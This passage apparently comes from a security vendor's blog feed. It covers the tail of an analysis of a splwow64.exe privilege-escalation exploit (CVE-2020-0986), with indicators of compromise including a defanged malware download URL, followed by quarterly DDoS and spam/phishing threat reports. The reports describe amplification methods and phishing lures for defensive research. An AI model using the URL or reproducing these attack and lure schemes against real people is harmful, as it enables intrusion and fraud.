The vulnerability makes it possible to read and write the arbitrary memory of the splwow64.exe process using interprocess communication, and use it to achieve code execution in the splwow64.exe process, bypassing the CFG and EncodePointer protection. The exploit comes with two executables embedded in its resources. The first executable is written to disk as CreateDC.exe and is used to create a device context (DC), which is required for exploitation. The second executable has the name PoPc.dll and if the exploitation is successful, it is executed by splwow64.exe with a medium integrity level. We will provide further details on CVE-2020-0986 and its exploitation in a follow-up post.

Execution of a malicious PowerShell command from splwow64.exe

The main functionality of PoPc.dll is also located inside a single function. It executes an encoded PowerShell command that proceeds to download a file from www[.]static-cdn1[.]com/update.zip, saves it to the temporary folder as upgrader.exe and executes it. We were unable to analyze upgrader.exe because Kaspersky technologies prevented the attack before the executable was downloaded.

IoCs

www[.]static-cdn1[.]com/update.zip
B06F1F2D3C016D13307BC7CE47C90594
D02632CFFC18194107CC5BF76AECA7E87E9082FED64A535722AD4502A4D51199
5877EAECA1FE8A3A15D6C8C5D7FA240B
7577E42177ED7FC811DE4BC854EC226EB037F797C3B114E163940A86FD8B078B
B72731B699922608FF3844CCC8FC36B4
7765F836D2D049127A25376165B1AC43CD109D8B9D8C5396B8DA91ADC61ECCB1
E01254D7AF1D044E555032E1F78FF38F
81D07CAE45CAF27CBB9A1717B08B3AB358B647397F08A6F9C7652D00DBF2AE24

2020. augusztus 10.

DDoS attacks in Q2 2020

News overview

Not just one but two new DDoS amplification methods were discovered last quarter. In mid-May, Israeli researchers reported a new DNS server vulnerability that lurks in the DNS delegation process. The vulnerability exploitation scheme was dubbed “NXNSAttack”. The hacker sends to a legitimate recursive DNS server a request to several subdomains within the authoritative zone of its own malicious DNS server. In response, the malicious server delegates the request to a large number of fake NS servers within the target domain without specifying their IP addresses. As a result, the legitimate DNS server queries all of the suggested subdomains, which leads to traffic growing 1620 times. A new version of DNS server software fixes the vulnerability.

About a week later, Chinese researchers posted information about another DDoS amplification method, named RangeAmp. The method exploits HTTP range requests that allow downloading files in parts. The experts found that a malicious range request can make content delivery networks (CDNs) increase load on a target site several times. The researchers identify two types of RangeAmp attacks. The first involves sending traffic from the CDN server directly to the servers of the target resource while amplifying it 724 to 43330 times. In the other case, increased volumes of garbage traffic are transferred between two CDN servers, with the amplification factor reaching 7500. According to the researchers, most CDN providers have released updates that safeguard their servers from this kind of attack or have stated an intention to do so.

As researchers investigate these new ways of amplifying attacks, DDoS botnet owners look for new resources to expand them. In June, our colleagues at Trend Micro discovered that the Kaiji and XORDDoS malicious programs, which formerly specialized in IoT devices, were targeting unprotected Docker servers. In the event of a successful attack, a XORDDoS bot penetrated every container on the server, and Kaiji created one of its own. Docker containers may prove unsuited for DDoS attacks — in particular because of the possibility of limiting the number of network protocols they use. Therefore, unprotected containers are attacked primarily by mining bots. However, some malware successfully combines a DDoS bot and a miner. For example, a bot that can both stage TCP, UDP and HHTP DDoS attacks, and hijack cryptocurrency for its operators was recently discovered in the wild.

The resonant socio-political events that marked the first quarter of 2020 could not but alter the picture of DDoS attacks. Thus, attacks on human rights organizations in the United States soared 1,120 times at the end of May. This activity coincided with the protests that unfolded in that country. The opposite side of the conflict was affected, too: the Minnesota State Information Technology Services were targeted by a DDoS attack. In particular, unknown hackers knocked out the Minneapolis police website. Around the same time, several tweets alleged that Anonymous hacktivists, who had previously threatened to expose police crimes, were behind the attack, but the group did not claim responsibility for the incident.

In June, Russia hosted a multi-day vote on amendments to its constitution, and preparations for the event were marked by DDoS attacks. The day after the voting began, the Central Election Commission said it had been attacked. The online voting service was hit right after the CEC, but officials said its operation was not disrupted. The service was experiencing outages at the beginning of the voting process: it could not handle legitimate load. The конституция2020.рф information website (covering the amendments into the RF constitution) was attacked as well. According to a CEC spokesperson, the site was inundated by garbage traffic originating in Great Britain and Singapore on June 28.

The media traditionally received their share of the attacks. This time, the Belarus Partisan independent social and political publication came under attack. According to a spokeswoman, the portal was flooded from foreign IP addresses before sources located in Belarus joined in. The owners of the website were forced to change its IP address. Belarusian online media have increasingly been targeted by DDoS operators.

The second quarter of the year in many countries saw measures to fight the COVID-19 pandemic, with the employees of many countries and institutions working remotely as before. Accordingly, the number of attacks on online resources remained high. According to Russia’s Rostelecom, the number of attempts at knocking offline education websites, such as e-diaries, instructional platforms, testing sites, etc., grew more than five times.

However, not every large-scale communication outage is a consequence of a DDoS attack. In mid-June, users the United States experienced problems accessing T-Mobile and Verizon networks. There were tweets about a large-scale DDoS attack on these wireless carriers and several social networks, allegedly originating in China, but these reports were left unconfirmed. On the contrary, T-Mobile stated that in reality, the affected resources, including those of the company’s competitors’, became inaccessible due to a wired provider failure in the Southeast, which caused network overload.

As failures and threat actors knocked out useful services, Dutch police shut down fifteen websites that sold DDoS attack services. In addition to that, in April Dutch law enforcement officers arrested a nineteen-year-old who attempted to disrupt the operation of several government portals in March. Police was determined to fight against services and individuals linked to DDoS activity. They have declared an intention to complicate this sort of attacks as much as they can.

Other countries have continued to fight DDoS attacks, too. In Israel, for example, former co-owners of a website that sold attack services were sentenced to six months of community service and fines. The malware service vDOS lasted four years and was shut down in 2016.

Quarter trends

Over the past few years, we have seen a significant drop in the number of DDoS attacks in the second quarter compared to the first, which is usually a tense period. However, from April to June of 2020, the picture remained nearly the same as in the previous reporting period: the overall number of attacks increased slightly, the number of smart attacks decreased slightly, but the profiles for the two quarters hardly differed overall.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Comparative number of DDoS attacks, Q1 and Q2 2020, and Q2 2019. Q2 2019 data taken as 100% (download)

The fact that the data we obtained for the “low” second quarter was virtually identical to that for the “high” first quarter is a testament to unprecedented growth in attacks in the reporting period. This is easy to see if one compares the figures for the second quarter of 2020 with the data for the same period in 2019: the total number of attacks more than tripled, and the number of smart attacks more than doubled.

The duration of attacks on the average did not change in comparison with the first quarter or with last year, remaining at the level of around twenty minutes. Smart attacks, which lasted an average of several hours, were the longest. This trend has persisted for a long time, so this was nothing new to us. However, we should note that we observed an unusually long smart attack activity in the second quarter. This affected the maximum DDoS duration, which increased 4.5 times compared to last year. We excluded that attack from the sample when calculating averages.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Duration of DDoS attacks, the Q1 and Q2 2020, and Q2 2019 Q2 2019 data taken as 100% (download)

Just like the previous reporting period, the second quarter saw educational and government institutions targeted the most frequently. At the same time, the number of attacks on the educational sector decreased sharply starting in the second half of June, which could be attributed to the start of the summer break.

Quarter statistics Quarter results
  • The top three of the most attacked countries are the same: China (65.12%), the United States (20.28%) and Hong Kong, China (6.08%).
  • Romania dropped out of the top ten and was ranked the 17th, whereas Great Britain rose from the eighteenth to the tenth position.
  • The top five places in terms of both the number of targets and the number of attacks are occupied by China (66.02%), the United States (19.32%), Hong Kong, China (6.34%), South Africa (1.63%) and Singapore (1.04%).
  • We are seeing the now-familiar trend of attacks abating begin to reverse: this April, their number grew, peaking at 298 on April 9.
  • In the second quarter, we observed two dips several days long each, April 30 to May 6 and June 10–12, when the number of attacks remained within the range of ten to fifteen per day.
  • DDoS botnet activity increased on Wednesdays and Thursdays and decreased on Saturdays.
  • Even the longest attacks did not reach nine days (215, 214 and 210 hours), which is more than half the number of the previous quarter’s longest-lasting attacks (about 19 days).
  • SYN flood remains the main DDoS attack tool (94.7%), ICMP attacks accounted for 4.9 percent, and other types of DDoS attacks were sidelined.
  • The ratio of Windows-to-Linux botnets remained virtually unchanged, with the latter still responsible for the absolute majority (94.78%) of attacks.
Attack geography

In the second quarter of 2020, China (65.12%) again led by a wide margin, followed, as before, by the United States (20.28%) and Hong Kong, China (6.08%). The share of the first two countries increased by 3.59 and 1.2 p.p., respectively, whereas the share of Hong Kong, China decreased slightly, by 1.26 p.p.

Changes in the top ten were few as well. We are still seeing there South Africa (1.28%) Singapore (1.14%), both countries rising by a notch, now occupying the fourth and fifth positions, respectively. Next up is India (0.33%) and Australia (0.38%), which rose from ninth to seventh and from tenth to sixth place, respectively. These are followed by Canada (0.24%), which slipped to the ninth row.

Great Britain (0.18%; rose by 0.1 p.p.) is the newcomer in the rankings, sharing tenth place with South Korea. The EU countries, seldom targeted individually  by DDoS operators, were seventh, with a share of 0.26%. Romania, however, slid from fourth to seventeenth place, dropping out of the top ten.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of DDoS attacks by country, Q1 and Q2 2020 (download)

The geographical distribution of unique targets traditionally replicates the distribution of attacks to a large extent. Six out of ten countries in the rankings overlap in the second quarter, with the top five being complete matches: China (66.02%), the United States (19.32%), Hong Kong, China (6.34%), South Africa (1.63%) and Singapore (1.04%). At the same time, only China registered an increase in the share of targets compared to the previous reporting period, by 13.31 p.p., while the rest showed a slight decline.

Sixth place went to Australia (0.3%), which was ninth in the first quarter. In addition, Vietnam returned to the top ten after a brief absence: with a small increase in the share of targets on its territory (just 0.06 p.p., to 0.23%), it occupied seventh position, displacing South Korea, which now shares the last two rows in the rankings with this quarter’s newcomer, Japan (0.18%), and has overtaken India, whose 0.23% of targets ensured that it took eighth place.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of unique DDoS attack targets by country, Q1 and Q2 2020 (download)

Dynamics of the number of DDoS attacks

The second quarter is normally calmer than the first, but this year is an exception. The long-term downward trend in attacks has unfortunately been interrupted, and this time we are witnessing an increase. The peaks occurred on April 9 (298 attacks) and April 1 (287 attacks within one day). Besides, the number of attacks exceeded the peak for the past two quarters twice, on May 13 and 16. In early May, DDoS operators apparently decided to go on a break: not once did the number of attacks reach fifteen within a day between April 30 and May 6, and between May 2 and May 4, just eight or nine per day were registered. The period of June 10–12 saw another lull, with 13, 15 and 13 attacks respectively.

The last three quarters have thus seen both a record high and a record low number of attacks. It is worth noting here that the quietest days repeated the absolute record in the observation period, set in the last quarter of 2019, but the busiest ones fall far short of even the relatively quiet third quarter. That said, the average number of attacks increased by almost thirty percent compared to the previous reporting period.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Dynamics of the number of DDoS attacks in Q2 2020 (download)

In the second quarter, the operators of the attacks preferred to work on Wednesdays (16.53%) and rested from their wicked deeds on Saturdays (only 11.65%). However, the difference between the “leader” and “anti-leader” is small, just 4.88 p.p. Compared to the last quarter, the share of attacks increased significantly on Wednesdays (by 5.37 p.p.) and Thursdays (by 3.22 p.p.), while Monday dropped (minus 3.14 p.p.).

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of DDoS attacks by day of the week, Q1 and Q2 2020 (download)

Duration and types of DDoS attacks

The average duration of attacks decreased slightly (by 4 p.p.) when compared to the previous reporting period due to an increase in the share of ultrashort attacks and a decrease of 0.1 p.p. in the share of multi-day attacks, but more so due to an absence of ultra-long attacks. Whereas the first quarter saw attacks that lasted up to twenty days, this time, the top three lasted 215, 214 and 210 hours, that is less than nine days.

The distribution of attacks by duration has hardly changed: the aforementioned increase by 4 p.p. is the most significant event, with the remaining differences being within the range of 0.06 to 1.9 p.p., almost a statistical blip. Thus, the shortest attacks (up to four hours) accounted for 85.97% of the total number of DDoS attacks, those lasting five to nine hours for 8.87%, attacks up to 19 hours for 3.46%, attacks up to 49 hours for 1.39%, and attacks up to 99 hours in duration, for 0.11%. Attacks within the range of 100 to 139 hours proved to be slightly more numerous (0.16%), and the longest attacks accounted for 0.05% of the total DDoS attack number.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of DDoS attacks by duration (hours), Q1 and Q2 2020 (download)

The share of SYN flooding in the quarter was 94.7% (up by 2.1 p.p.). For a second consecutive quarter, the leader is followed by ICMP flooding (4.9%), which is 1.3 p.p. above the previous reporting period. TCP attacks accounted for 0.2% of the total number, and UDP and HTTP attacks (0.1%) round out the list. The share of the last three groups dropped when compared to the previous quarter.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of DDoS attacks by type, Q2 2020 (download)

The share of Windows botnets decreased by 0.41 p.p. to 5.22% compared to the previous quarter. Linux botnets thus account for 94.78% of all zombie networks.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Ratio of Windows and Linux botnet attacks, Q1 and Q2 2020 (download)

Conclusion

The second quarter of 2020 is notable for the number of DDoS attacks: the period from April through June normally sees a lull, but this year, DDoS activity increased in comparison to the previous reporting period. This is most likely due to the coronavirus pandemic and restrictive measures that lasted for part or all of the quarter in many countries. The forced migration of many day-to-day activities online led to an increase in potential DDoS targets. Little changed in the second quarter otherwise: the composition of the top ten list in terms of the number of attacks and targets was virtually the same, as was the distribution of attacks by duration. The proportion of all types of DDoS attacks, except for SYN and ICMP flood, dropped markedly, but talking about any kind of trend in this regard would be premature.

We expect third-quarter results, typically low, to be at about the same level as the second quarter, or to decrease slightly, having no reasons to believe otherwise at the time of writing this. It will be exceptionally interesting to watch attacks in the fourth quarter: the end of the year and the holiday season traditionally see no shortage of DDoS attacks, so if the trend continues — especially if we are hit by a second wave of the epidemic — it is possible that the DDoS market will grow significantly.

 

2020. augusztus 7.

Spam and phishing in Q2 2020

Quarterly highlights Targeted attacks

The second quarter often saw phishers resort to targeted attacks, especially against fairly small companies. To attract attention, scammers imitated email messages and websites of companies whose products or services their potential victims could be using.

The scammers did not try to make any of the website elements appear credible as they created the fake. The login form is the only exception. One of the phishing websites we discovered even used a real captcha on that form.

The main pretext that scammers use to prompt the target to enter their information is offering an online catalog that purportedly only becomes available once the target provides the login and password to their email account.

In one instance, phishers used Microsoft Sway, the service for creating and sharing presentations, to hunt for logins and passwords for corporate accounts. The user was offered to view presentations belonging to another company in the same industry by following a link and entering the login and password for their work email account.

A fake website can be recognized by its design. The workmanship is often rough, and the chunks of information on the various pages are disjointed due to being pulled from diverse sources. Besides, pages like that are created on free hosting websites, as cybercriminals are not prepared to invest too much money in the fakes.

A targeted phishing attack may lead to serious consequences: after gaining access to an employee’s mailbox, cybercriminals can use it for further attacks on the company itself, or its employees or partners.

Waiting for your package: keeping your data secure and your computer, clean

As the pandemic reached its peak, mail service between countries became complicated and delivery times noticeably increased. Organizations responsible for delivery of letters and parcels rushed to notify recipients about all kinds of possible delays and hiccups. This is exactly the type of email messages that scammers started to imitate: the target was offered to open the attachment to find out the address of the warehouse with the package that had failed to reach them.

Another, relatively original, trick employed by cybercriminals was a message containing a miniature image of a postal receipt. The scammers expected the curious recipient to take the attachment, which was an ACE archive despite its name containing “jpg”, for the real thing and open it. The mailshots we detected used this as a method of spreading the Noon spyware. The scam can only be detected if the email client displays the full names of attachments.

In another fraudulent scheme, the target was to told that their order could not be dispatched due to a restriction on mailing of certain types of goods, but the processing of the package would be resumed once the restrictions were lifted. All required documents and a new tracking number could purportedly be found in the attached archive. In reality, the attachment contained a copy of the Androm backdoor, which opened remote access to the victim’s computer.

Scammers posing as courier service employees sent out email warning that packages could not be delivered due to failure to pay for the shipping. The “couriers” accepted codes for prepaid cards issued by Paysafecard as payment. These cards range from €10 to €100 and can be used in stores that accept this payment method. The victim was offered to email a €50 card code – incidentally, an activity that the payment system’s rules explicitly forbid. The cybercriminals chose this payment method for a reason: blocking or revoking a Paysafecard payment is next to impossible.

Banking phishing amid a pandemic

Banking phishing attacks in the second quarter of the year often employed emails that offered borrowers various pandemic-related discounts and bonuses. Accessing the benefits involved downloading a file with a manual or following a link. As a result, the scammers could access the user’s computer, personal data or credentials for various services, depending on the scheme.

The COVID-19 theme was present, too, in the widely known fake bank emails informing customers that their accounts had been blocked, and that they needed to enter their login and password on a special page to get back their access.

The pandemic saw the revival of a more-than-a-decade-old scheme, in which scammers sent victims emails offering to open the attachment to get the details of a low-rate loan. This time, the rate reduction was linked to the pandemic.

Taxes and exemptions

The beginning of the second quarter is the time for submitting tax forms in many countries. This year, tax authorities in some countries reduced the tax burden or exempted citizens from paying taxes. Scammers naturally grabbed the opportunity: mailshots we detected reported that the government had approved a compensation payout, and claiming it involved following a link to the tax agency’s website, which, unsurprisingly, proved to be fake. Some of the email messages were not too well crafted, and looking closely at the From field was all it took to detect a fake.

More ingenious scammers made up a whole legend: in an email presented as being from the IRS (United States Internal Revenue Service), they said there was a $500,000 “pandemic payment”, authorized jointly by the UN and the World Bank, that could be transferred to the recipient if it had not been for a woman named Annie Morton. The lady, the email said, had showed up at an IRS office carrying a warrant for the payment. She purportedly said that the intended recipient had succumbed to COVID-19, and she was the one to receive the $500,000. The message insisted that the victim contact a certain IRS employee – and not any other, so as to avoid a mistake – to prove that they were alive.

Subsequent steps would most likely be identical to the well-known inheritance scam, where the victim would be offered to pay for the services of a lawyer, who would then disappear with the advance money. One might guess that instead of the advance, the scammers would ask for a fee for executing papers that would prove the victim was still alive.

Getting refunded and losing it all

Tax refunds are not the only type of aid that states have been providing to individuals and companies distressed by the pandemic. And not the only type the scammers have been using. Thus, Brazilians were “allowed” not to pay their energy bills, and all they had to do was register on a website by following a link in an “email from the government”. The hyperlink had an appearance designed to trick the user into thinking that they were being redirected to a government portal, whereas in reality, the victim had a trojan installed on their computer, which downloaded and then ran another trojan, Sneaky.

Personal information leak is another hazard faced by those who risk registering for “compensation” on a suspicious website. For example, one mailshot offered individuals aged over seventy to go to a website and fill out a form, which contained fields for the last name, first name, gender, mailing address and SSN (social security number, for US citizens).

Identifying a fake email is easy. One just needs to take a closer look at the From field and the subject, which appears odd for an official email.

Once the target filled out the entire form, they were redirected to the official Web page of the World Health Organization’s COVID-19 Solidarity Response Fund, a real organization, to give a donation. This helped the scammers to create an illusion that the questionnaire was official and to build a vast database containing the details of individuals over seventy years of age.

Fake emails promising government compensations carried one more threat: instead of getting paid, the victim risked losing their own money to the cybercriminals. Thus, a fake email from the International Monetary Fund announced that the recipient and sixty-four other “lucky” individuals had been selected to receive compensations from a five-hundred-million-dollar fund set up by the IMF, China and the European Union for supporting victims of the pandemic. Getting €950,000 was a matter of contacting the IMF office at the address stated in the message. Subsequent events followed the lottery-scam script: getting the money required paying a commission first.

Fake HR: getting dismissed by professional spammers

The pandemic-related economic downturns in several countries caused a surge in unemployment, an opportunity that cybercriminals were quick to take advantage of. One mailshot, sent in the name of the US Department of Labor, offered looking at the latest changes to the parental leave and sick leave laws. The sender said these laws had been amended following the adoption of the coronavirus relief act, and all details on the amendments were available in the attachment. What the attachment really contained was Trojan-Downloader.MSOffice.SLoad.gen, a trojan mostly used for downloading and installing ransomware.

Another way scammers “surprised” potential victims was dismissal notices. The employee was informed that the company had been forced to discharge them due to the pandemic-induced recession. The dismissal “followed the book”, in that the attachment, according to the author of the email, contained a request form for two months’ worth of pay. Needless to say, the victim only found malware attached.

Your data wanted, now

The share of voice phishing in email traffic rose noticeably at the end of Q2 2020. One mailshot warned of a suspicious attempt at logging in to the target’s Microsoft account, originating in another country, and recommended that the target contact support by phone at the supplied number. This spared the scammers the need to create a large number of fake pages, as they tried to get all the information they needed over the phone.

An even less conventional way of obtaining personal data could be found in emails that offered subscription to COVID-19 updates, where the target only needed to verify their email address. Besides personal data theft, forms like this can be used for collecting mailbox usage statistics.

Statistics: spam Proportion of spam in email traffic

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Proportion of spam in global email traffic, Q1 2020 – Q2 2020 (download)

In Q2 2020, the largest share of spam (51.45 percent) was recorded in April. The average percentage of spam in global email traffic was 50,18%, down by 4.43 percentage points from the previous reporting period.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Proportion of spam in Runet email traffic, Q1 2020 – Q2 2020 (download)

The Russian segment of the World Wide Web presents the opposite picture, with the end of the quarter accounting for the larger share of spam: spam peaked in June as it reached 51.23 percent. The quarterly average was 50.35 percent, 1.06 p.p. lower that the first quarter’s average.

Sources of spam by country

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Countries where spam originated in Q2 2020 (download)

The composition of the top five Q1 2020 spam leaders remained unchanged in the second quarter. Russia kept the lead with 18.52 percent, followed by Germany with 11.94 percent, which had overtaken the US, now third with 10.65 percent. France (7.06 percent) and China (7.02 percent) remained fourth and fifth, respectively.

Sixth was the Netherlands (4.21 percent), closely followed by Brazil (2.91 percent), Turkey (2.89 percent), Spain (2.83 percent) and lastly, Japan (2.42 percent).

Spam email size

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Spam email size, Q1 – Q2 2002 (download)

The share of extra small emails kept going down, dropping by 8.6 p.p. to 51.30 percent in Q2 2020. Emails between 5 KB and 10 KB decreased slightly (by 0.66 p.p.) compared to the previous quarter, to 4.90 percent. Meanwhile, the share of spam messages within the range of 10 KB to 20 KB rose by 4.73 p.p. to 11.09 percent. The share of larger messages between 100 KB and 200 KB in the second quarter fell by 1.99 p.p. to 2.51 percent compared to Q1 2020.

Malicious attachments: malware families

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of Mail Anti-Virus triggerings, Q1 2020 – Q2 2020 (download)

Our security solutions detected a total of 43,028,445 malicious email attachments in Q2 2020, an increase of six and a half million year-on-year.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

TOP 10 malicious attachments in mail traffic, Q2 2020 (download)

Trojan.Win32.Agentb.gen (13.27 percent) was the most widespread malware in email attachments in the second quarter of the year, followed by Trojan-PSW.MSIL.Agensla.gen (7.86 percent) in second place and Exploit.MSOffice.CVE-2017-11882.gen (7.64 percent) in third place.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

TOP 10 malware families in mail traffic, Q2 2020 (download)

The most widespread malware family in the second quarter, as in the previous one, was Trojan.Win32.Agentb (13.33 percent), followed by Trojan-PSW.MSIL.Agensla (9.40 percent) and Exploit.MSOffice.CVE-2017-11882 (7.66 percent).

Countries targeted by malicious mailshots

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of Mail Anti-Virus triggerings by country, Q2 2020 (download)

Spain (8.38%) took the lead in Mail Anti-Virus triggerings in Q2 2020, just as in Q1 2020. Second came Russia with 7.37 percent of attacks, and third came Germany with 7.00 percent.

Statistics: phishing

Kaspersky Anti-Phishing helped to prevent 106,337,531 attempts at redirecting users to phishing Web pages in Q2 2020, a figure that is almost thirteen million lower than that for the first quarter. The share of unique attacked users accounted for 8.26 percent of the total Kaspersky users in the world, with 1,694,705 phishing wildcards added to the system database.

Attack geography

Venezuela was traditionally the country with the largest share of users attacked by phishers (17.56 percent).

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of phishing attacks, Q2 2020 (download)

Portugal was 4.05 p.p. behind with 13.51 percent, closely followed by Tunisia with 13.12 percent.

Country %* Venezuela 17.56% Portugal 13.51% Tunisia 13.12% France 13.08% Brazil 12.91% Qatar 11.94% Bahrain 11.88% Guadeloupe 11.73% Belgium 11.56% Martinique 11.34%

*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky users in the country

Top-level domains

Starting with this quarter, we have decided to maintain statistics on top-level domains used in phishing attacks. Quite predictably, COM led by a huge margin, with 43.56 percent of the total number of top-level domain names employed in attacks. It was followed by NET (3.96 percent) and TOP (3.26 percent). The Russia-specific RU domain took fourth place with 2.91 percent, followed by ORG with 2.55 percent.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Top-level domains most popular with phishers, Q2 2020 (download)

Organizations under attack

The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Anti-Phishing component. This component detects pages with phishing content that the user tried to access by following email or Web links, regardless of how the user got to the page: by clicking a link in a phishing email or in a message on a social network, or after being redirected by a malicious program. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

 As in the first quarter, the Online Stores category accounted for the largest share of phishing attacks, its share increasing by 1.3 p.p. to 19.42 percent. Global Web Portals again received the second-largest share of attacks, virtually unchanged at 16.22 percent. Banks (11.61 percent) returned to third place, pushing Social Networks (10.08 percent) to fourth place.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of organizations subjected to phishing attacks by category, Q2 2020 (download)

Conclusion

In our summary of the first quarter, we hypothesized that COVID-19 would remain spammers’ and fishers’ key theme in the future. That is exactly what happened: seldom did a mailshot fail to mention the pandemic as phishers added relevance to their tried and tested schemes and came up with brand-new ones.

The average share of spam in global email traffic in Q2 2020 dropped by 4.43 p.p. to 50.18 percent compared to the previous reporting period, and attempts to access phishing pages amounted to 106 million.

First place in the list of spam sources in Q2 went to Russia with a share of 18.52 percent. Our security solutions blocked a total of 43,028,445 malicious email attachments, with the most widespread “email-specific” malware family being Trojan.Win32.Agentb.gen, which infected 13.33 percent of the total email traffic.

2020. augusztus 6.

